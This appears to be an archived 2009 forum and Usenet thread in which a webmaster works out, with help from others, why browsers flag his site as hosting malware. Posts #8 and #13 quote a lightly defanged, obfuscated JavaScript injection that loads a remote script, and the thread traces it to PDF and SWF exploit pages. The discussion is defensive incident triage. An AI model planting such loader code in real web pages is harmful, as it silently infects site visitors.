Page 1 of 3 123 LastLast
Results 1 to 20 of 56

Thread: Web site compromised?

  1. #1
    Kompu Kid
    Guest

    Web site compromised?

    Hello All:

    A website I manage seems to have a problem when I tried to access it
    today with Chrome browser.

    Chrome gives the following warning:


    "Warning: Visiting this site may harm your computer!
    The website at www.XXXX.YYY (I am not giving the actual URL) contains
    elements from the site beebest.cn, which appears to host malware
    software that can hurt your computer or otherwise operate without your
    consent. Just visiting a site that contains malware can infect your
    computer.
    For detailed information about the problems with these elements, visit
    the Google Safe Browsing diagnostic page for beebest.cn.
    Learn more about how to protect yourself from harmful software online.
    I understand that visiting this site may harm my computer. "

    How can "elements" from beebest.cn can be on this site? What "do"
    elements mean in this case?

    I am downloading the site and will do a text search for "beebest" .

    Any other recommendations?

    Thanks

    Deguza



  2. #2
    Kompu Kid
    Guest

    Re: Web site compromised?

    On Apr 22, 12:46*am, Kompu Kid <deg...@hotmail.com> wrote:
    > Hello All:
    >
    > A website I manage seems to have a problem when I tried to access it
    > today with Chrome browser.
    >
    > Chrome gives the following warning:
    >
    > "Warning: Visiting this site may harm your computer!
    > The website atwww.XXXX.YYY(I am not giving the actual URL) contains
    > elements from the site beebest.cn, which appears to host malware
    > software that can hurt your computer or otherwise operate without your
    > consent. Just visiting a site that contains malware can infect your
    > computer.
    > For detailed information about the problems with these elements, visit
    > the Google Safe Browsing diagnostic page for beebest.cn.
    > Learn more about how to protect yourself from harmful software online.
    > *I understand that visiting this site may harm my computer. *"
    >
    > How can "elements" from beebest.cn can be on this site? What "do"
    > elements mean in this case?
    >
    > I am downloading the site and will do a text search for "beebest" .
    >
    > Any other recommendations?
    >
    > Thanks
    >
    > Deguza


    I just had a friend try to access my website. He got the same message
    except the beebest.cn was replaced by www.corpamata.cn.

    What is going on?

    Deguza


  3. #3
    Martin
    Guest

    Re: Web site compromised?

    Kompu Kid wrote:
    > On Apr 22, 12:46 am, Kompu Kid <deg...@hotmail.com> wrote:
    >> Hello All:
    >>
    >> A website I manage seems to have a problem when I tried to access it
    >> today with Chrome browser.
    >>
    >> Chrome gives the following warning:
    >>
    >> "Warning: Visiting this site may harm your computer!
    >> The website atwww.XXXX.YYY(I am not giving the actual URL) contains
    >> elements from the site beebest.cn, which appears to host malware
    >> software that can hurt your computer or otherwise operate without your
    >> consent. Just visiting a site that contains malware can infect your
    >> computer.
    >> For detailed information about the problems with these elements, visit
    >> the Google Safe Browsing diagnostic page for beebest.cn.
    >> Learn more about how to protect yourself from harmful software online.
    >> I understand that visiting this site may harm my computer. "
    >>
    >> How can "elements" from beebest.cn can be on this site? What "do"
    >> elements mean in this case?
    >>
    >> I am downloading the site and will do a text search for "beebest" .
    >>
    >> Any other recommendations?
    >>
    >> Thanks
    >>
    >> Deguza

    >
    > I just had a friend try to access my website. He got the same message
    > except the beebest.cn was replaced by www.corpamata.cn.
    >
    > What is going on?


    Dunno, but if it were my site I'd be looking to sack the webmaster
    because he doesn't seem to know what he's doing.

    Post the frigging site and you might get a descent answer from someone
    who bothers to go and look at the code.
    >
    > Deguza
    >


  4. #4
    Kompu Kid
    Guest

    Re: Web site compromised?

    On Apr 22, 1:28*am, Martin <usene...@etiqa.co.uk> wrote:
    > Kompu Kid wrote:
    > > On Apr 22, 12:46 am, Kompu Kid <deg...@hotmail.com> wrote:
    > >> Hello All:

    >
    > >> A website I manage seems to have a problem when I tried to access it
    > >> today with Chrome browser.

    >
    > >> Chrome gives the following warning:

    >
    > >> "Warning: Visiting this site may harm your computer!
    > >> The website atwww.XXXX.YYY(Iam not giving the actual URL) contains
    > >> elements from the site beebest.cn, which appears to host malware
    > >> software that can hurt your computer or otherwise operate without your
    > >> consent. Just visiting a site that contains malware can infect your
    > >> computer.
    > >> For detailed information about the problems with these elements, visit
    > >> the Google Safe Browsing diagnostic page for beebest.cn.
    > >> Learn more about how to protect yourself from harmful software online.
    > >> *I understand that visiting this site may harm my computer. *"

    >
    > >> How can "elements" from beebest.cn can be on this site? What "do"
    > >> elements mean in this case?

    >
    > >> I am downloading the site and will do a text search for "beebest" .

    >
    > >> Any other recommendations?

    >
    > >> Thanks

    >
    > >> Deguza

    >
    > > I just had a friend try to access my website. He got the same message
    > > except the beebest.cn was replaced bywww.corpamata.cn.

    >
    > > What is going on?

    >
    > Dunno, but if it were my site I'd be looking to sack the webmaster
    > because he doesn't seem to know what he's doing.
    >
    > Post the frigging site and you might get a descent answer from someone
    > who bothers to go and look at the code.
    >
    >
    >
    > > Deguza


    These guys are complaining about the same thing. However, some are
    finding no problems...

    http://www.greenockmorton.org/forum/...howtopic=26972

    Deguza

  5. #5
    1PW
    Guest

    Re: Web site compromised?

    On 04/22/2009 12:46 AM, Kompu Kid sent:
    > Hello All:
    >
    > A website I manage seems to have a problem when I tried to access it
    > today with Chrome browser.
    >
    > Chrome gives the following warning:
    >
    >
    > "Warning: Visiting this site may harm your computer!
    > The website at www.XXXX.YYY (I am not giving the actual URL) contains
    > elements from the site beebest.cn, which appears to host malware
    > software that can hurt your computer or otherwise operate without your
    > consent. Just visiting a site that contains malware can infect your
    > computer.
    > For detailed information about the problems with these elements, visit
    > the Google Safe Browsing diagnostic page for beebest.cn.
    > Learn more about how to protect yourself from harmful software online.
    > I understand that visiting this site may harm my computer. "
    >
    > How can "elements" from beebest.cn can be on this site? What "do"
    > elements mean in this case?
    >
    > I am downloading the site and will do a text search for "beebest" .
    >
    > Any other recommendations?
    >
    > Thanks
    >
    > Deguza


    Hello Deguza:

    I too believe we should be dealing with specifics. Please reply with
    your site's true and complete URL in the form of:

    <hxxp://www.xxxx.yyy/>
    ^^

    In the meantime, you may wish to see if your application software is
    updated to the latest possible versions so as to have all possible
    security holes plugged. If you also manage the website's OS please post
    a great deal of detail on its state of revision. It wouldn't hurt to
    give us the ISP so we don't have to dig for it. Do you also maintain
    its hardware?

    Warm regards,

    Pete
    --
    1PW @?6A62?FEH9:DE=6o2@=]4@> [r4o7t]

  6. #6
    John Holmes
    Guest

    Re: Web site compromised?

    Kompu Kid "contributed" in alt.hacker:

    > (I am not giving the actual URL)


    Don't expect any help then.

    --
    <snip>


  7. #7
    erewhon
    Guest

    Re: Web site compromised?

    A website I manage seems to have a problem when I tried to access it
    today with Chrome browser.

    Does it use SQL queries. If so, likely malware was inserted via SQL
    injection



  8. #8
    Kompu Kid
    Guest

    Re: Web site compromised?

    On Apr 22, 2:21*pm, "erewhon" <erew...@nowhere.net> wrote:
    > A website I manage seems to have a problem when I tried to access it
    > today with Chrome browser.
    >
    > Does it use SQL queries. If so, likely malware was inserted via SQL
    > injection


    No, it does not use SQL queries.

    I found this in one of the pages. I have not put this in there, unless
    FrontPage, or the webhosting software put it in.

    Or it could be the infection (I am putting "-"s in some of the key
    words just in case it tries to execute on a the web...):

    <s-c-ript la-ngu-age=ja-va-script><!--
    do-cu-ment.w-rite(-u-n-e-s-c-a-p-e('ii%3CscriiipzIlt%20lhsCEtrgKc%3D%2F
    %2F940Cm%2E24Joq7%2Emeu2%2EgK19vN65gK%2FjzIlqulhevN6ryii%2ECEtjCEtsmeu
    %3EvN6%3C%2Fscriptlh%3E').rep-la-ce(/lh|vN6|meu|0Cm|Joq|zIl|CEt|pTv|gK|
    ii/g,""));
    --></script><body>

  9. #9
    Kompu Kid
    Guest

    Re: Web site compromised?

    On Apr 22, 9:22*am, John Holmes <nospam.13i...@gmail.com> wrote:
    > Kompu Kid "contributed" in alt.hacker:
    >
    > > (I am not giving the actual URL)

    >
    > Don't expect any help then.
    >
    > --
    > <snip>


    I did not want anybody getting infected, that's why I did not give it
    out.

    Deguza

  10. #10
    Todd H.
    Guest

    Re: Web site compromised?

    Kompu Kid <deguza@hotmail.com> writes:

    > These guys are complaining about the same thing. However, some are
    > finding no problems...
    >
    > http://www.greenockmorton.org/forum/...howtopic=26972


    PHP forums ...

    I lack the time to go there and triage it, but PHP is quite a
    playground, and forums even more so. Probably some sort of script
    injection attack if not a complete compromise.


    --
    Todd H.
    http://www.toddh.net/

  11. #11
    erewhon
    Guest

    Re: Web site compromised?


    "Kompu Kid" <deguza@hotmail.com> wrote in message
    news:d22517b4-3a4e-4fcb-97c4-5ea1ebe024ca@v23g2000pro.googlegroups.com...
    On Apr 22, 2:21 pm, "erewhon" <erew...@nowhere.net> wrote:
    > A website I manage seems to have a problem when I tried to access it
    > today with Chrome browser.
    >
    > Does it use SQL queries. If so, likely malware was inserted via SQL
    > injection


    No, it does not use SQL queries.

    What method do you use to upload content (ftp, and web admin page via http)?

    What web server is in use?

    The first is subject to password attack, the latter to application
    vulnerabilities.



  12. #12
    Gandalf Parker
    Guest

    Re: Web site compromised?

    Kompu Kid <deguza@hotmail.com> contributed wisdom to news:f1923657-9ee8-
    41ec-8ba7-beb74e9c329c@z23g2000prd.googlegroups.com:

    > I am downloading the site and will do a text search for "beebest" .
    >
    > Any other recommendations?
    >


    Do you have any dynamic content?
    Do you run banner ads that are not on your machine but are links to another
    machine?
    Do you include google keyword advertising?
    Do you have a link to a webring at the bottom of the webpage?

    Gandalf Parker

  13. #13
    David H. Lipman
    Guest

    Re: Web site compromised?

    From: "Kompu Kid" <deguza@hotmail.com>

    | On Apr 22, 2:21 pm, "erewhon" <erew...@nowhere.net> wrote:
    >> A website I manage seems to have a problem when I tried to access it
    >> today with Chrome browser.


    >> Does it use SQL queries. If so, likely malware was inserted via SQL
    >> injection


    | No, it does not use SQL queries.

    | I found this in one of the pages. I have not put this in there, unless
    | FrontPage, or the webhosting software put it in.

    | Or it could be the infection (I am putting "-"s in some of the key
    | words just in case it tries to execute on a the web...):

    | <s-c-ript la-ngu-age=ja-va-script><!--
    | do-cu-ment.w-rite(-u-n-e-s-c-a-p-e('ii%3CscriiipzIlt%20lhsCEtrgKc%3D%2F
    | %2F940Cm%2E24Joq7%2Emeu2%2EgK19vN65gK%2FjzIlqulhevN6ryii%2ECEtjCEtsmeu
    | %3EvN6%3C%2Fscriptlh%3E').rep-la-ce(/lh|vN6|meu|0Cm|Joq|zIl|CEt|pTv|gK|
    | ii/g,""));
    -->></script><body>

    Yes !

    The web site was compramised.

    A decode of the above brings one to; 94.247.x.y/jquery.js
    Which in turn brings you to...
    94.247.x.y/news/?id=2 ( pdf exploit )
    94.247.x.y/news/?id=3 ( swf exploit )

    --
    Dave
    http://www.claymania.com/removal-trojan-adware.html
    Multi-AV - http://www.pctipp.ch/downloads/dl/35905.asp



  14. #14
    erewhon
    Guest

    Re: Web site compromised?


    > The web site was compramised.
    >
    > A decode of the above brings one to; 94.247.x.y/jquery.js
    > Which in turn brings you to...
    > 94.247.x.y/news/?id=2 ( pdf exploit )
    > 94.247.x.y/news/?id=3 ( swf exploit )


    I don't think he's interested in how the malware works, rather how it got
    onto his web site in the first place. His lack of technical information is
    limiting the responses to 'commmon attack vectors' - we cannot provide a
    definative method by which this was done without further details of the
    host, how the content is updated, the o/s, web server, and apps running on
    it.....



  15. #15
    David H. Lipman
    Guest

    Re: Web site compromised?

    From: "erewhon" <erewhon@nowhere.net>


    >> The web site was compramised.


    >> A decode of the above brings one to; 94.247.x.y/jquery.js
    >> Which in turn brings you to...
    >> 94.247.x.y/news/?id=2 ( pdf exploit )
    >> 94.247.x.y/news/?id=3 ( swf exploit )


    | I don't think he's interested in how the malware works, rather how it got
    | onto his web site in the first place. His lack of technical information is
    | limiting the responses to 'commmon attack vectors' - we cannot provide a
    | definative method by which this was done without further details of the
    | host, how the content is updated, the o/s, web server, and apps running on
    | it.....


    The subject of the post sounds like a query of if it was compramised.

    If the code snippet provided was off the un-named web site. We can say... Yes, it is.

    The OP indicated the reason for not providing the web site was "I did not want anybody
    getting infected, that's why I did not give it
    out." However, it could be posted obfuscated just like he did the code-snippet.

    --
    Dave
    http://www.claymania.com/removal-trojan-adware.html
    Multi-AV - http://www.pctipp.ch/downloads/dl/35905.asp



  16. #16
    Kompu Kid
    Guest

    Re: Web site compromised?



    UPDATE:

    * I found also a My hosting services told me that an infection on my
    personal computer is probably where the injection of suspect codes
    have started. He says the virus on my computer used the ftp link I
    have to the web hosting site.

    * In addition to the script I gave earlier, I found on some pages
    another piece of code that had an "iframe" html command. The iframe
    was referring to a chinese site "betwager". I am not able to write the
    full code and the site. Google won't let me post it.


  17. #17
    David H. Lipman
    Guest

    Re: Web site compromised?

    From: "Kompu Kid" <deguza@hotmail.com>



    | UPDATE:

    | * I found also a My hosting services told me that an infection on my
    | personal computer is probably where the injection of suspect codes
    | have started. He says the virus on my computer used the ftp link I
    | have to the web hosting site.

    | * In addition to the script I gave earlier, I found on some pages
    | another piece of code that had an "iframe" html command. The iframe
    | was referring to a chinese site "betwager". I am not able to write the
    | full code and the site. Google won't let me post it.


    Don't use Google !

    news://nntp.aioe.org/alt.computer.security
    Crosss-Posted to the other groups.

    As for your hosting company, they could be wrong are just passing the blame to you.
    Chances are MORE likely that you use an application on the server with vulnerabilities and
    malicious actors have exploited them to add malicious code to your site.



    --
    Dave
    http://www.claymania.com/removal-trojan-adware.html
    Multi-AV - http://www.pctipp.ch/downloads/dl/35905.asp



  18. #18
    Kompu Kid
    Guest

    Re: Web site compromised?

    On Apr 23, 4:03*pm, "David H. Lipman" <DLipman~nosp...@Verizon.Net>
    wrote:
    > From: "Kompu Kid" <deg...@hotmail.com>
    >
    > | UPDATE:
    >
    > | * I found also a My hosting services told me that an infection on my
    > | personal computer is probably where the injection of suspect codes
    > | have started. He says the virus on my computer used the ftp link I
    > | have to the web hosting site.
    >
    > | * In addition to the script I gave earlier, I found on some pages
    > | another piece of code that had an "iframe" html command. The iframe
    > | was referring to a chinese site "betwager". I am not able to write the
    > | full code and the site. Google won't let me post it.
    >
    > Don't use Google !
    >
    > news://nntp.aioe.org/alt.computer.security
    > Crosss-Posted to the other groups.
    >
    > As for your hosting company, they could be wrong are just passing the blame to you.
    > Chances are MORE likely that you use an application on the server with vulnerabilities and
    > malicious actors have exploited them to add malicious code to your site.
    >
    > --
    > Davehttp://www.claymania.com/removal-trojan-adware.html
    > Multi-AV -http://www.pctipp.ch/downloads/dl/35905.asp


    It seems like I need to install a newsreader on my computer to use the
    "news://nntp.aioe.org/alt.computer.security ".

    Outlooked volunteered when I put that in my Chrome's address area, but
    I do not want to use it.

    Any recommendations for a news reader for the XP environment? If it
    matters, I use Firefox in addition to chrome.

    Deguza

  19. #19
    Todd H.
    Guest

    Re: Web site compromised?

    "David H. Lipman" <DLipman~nospam~@Verizon.Net> writes:

    > From: "Kompu Kid" <deguza@hotmail.com>
    >
    >
    >
    > | UPDATE:
    >
    > | * I found also a My hosting services told me that an infection on my
    > | personal computer is probably where the injection of suspect codes
    > | have started. He says the virus on my computer used the ftp link I
    > | have to the web hosting site.
    >
    > | * In addition to the script I gave earlier, I found on some pages
    > | another piece of code that had an "iframe" html command. The iframe
    > | was referring to a chinese site "betwager". I am not able to write the
    > | full code and the site. Google won't let me post it.
    > Crosss-Posted to the other groups.
    >
    > As for your hosting company, they could be wrong are just passing the blame to you.
    > Chances are MORE likely that you use an application on the server with vulnerabilities and
    > malicious actors have exploited them to add malicious code to your site.


    Much agreed. PHP is so pourous that it's much more likely to be a
    direct attack on your site rather than some convoluted "trojan on your
    computer that modifies local html and then magically knows what FTP
    client you're using, reuses its cached password for the site and loads
    the modified html onto the remote site."

    The target audience for such a client side sploit is so small it
    wouldn't be worthwhile.

    visit http://www.securityfocus.com/vulnerabilities

    and for each of the following, chase down what vulns there are for it
    for the version of each your site is running

    Web server version (apache whatever likely)
    php version on the server
    what php forum script you're using / version


    And see what vulns are in each for the versions you have, and that'll
    wittle down the "how" in what happened perhaps.


    --
    Todd H.
    http://www.toddh.net/

  20. #20
    David H. Lipman
    Guest

    Re: Web site compromised?

    From: "Kompu Kid" <deguza@hotmail.com>


    | It seems like I need to install a newsreader on my computer to use the
    | "news://nntp.aioe.org/alt.computer.security ".

    | Outlooked volunteered when I put that in my Chrome's address area, but
    | I do not want to use it.

    | Any recommendations for a news reader for the XP environment? If it
    | matters, I use Firefox in addition to chrome.

    | Deguza

    Mozilla Thunderbird - http://www.mozillamessaging.com/en-US/thunderbird/
    MicroPlanet Gravity - http://mpgravity.sourceforge.net/


    --
    Dave
    http://www.claymania.com/removal-trojan-adware.html
    Multi-AV - http://www.pctipp.ch/downloads/dl/35905.asp



Similar Threads

  1. Re: web site up but can't ping?
    By James Egan in forum ms.public.windows.networking.wireless
    Replies: 0
    Last Post: 11-14-08, 02:55 AM
  2. National Geographic Magazine's My Shot web site...
    By Indy in forum Digital Media and Photography
    Replies: 1
    Last Post: 06-28-08, 02:49 PM
  3. Cannot Get To A Web Site With Fios
    By contractor22 in forum Wireless Networks & Routers
    Replies: 2
    Last Post: 11-02-07, 07:30 AM
  4. Companies to pull ads from Coulter's Web site
    By knightmare in forum General Discussion Board
    Replies: 5
    Last Post: 03-06-07, 10:35 AM

Bookmarks

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •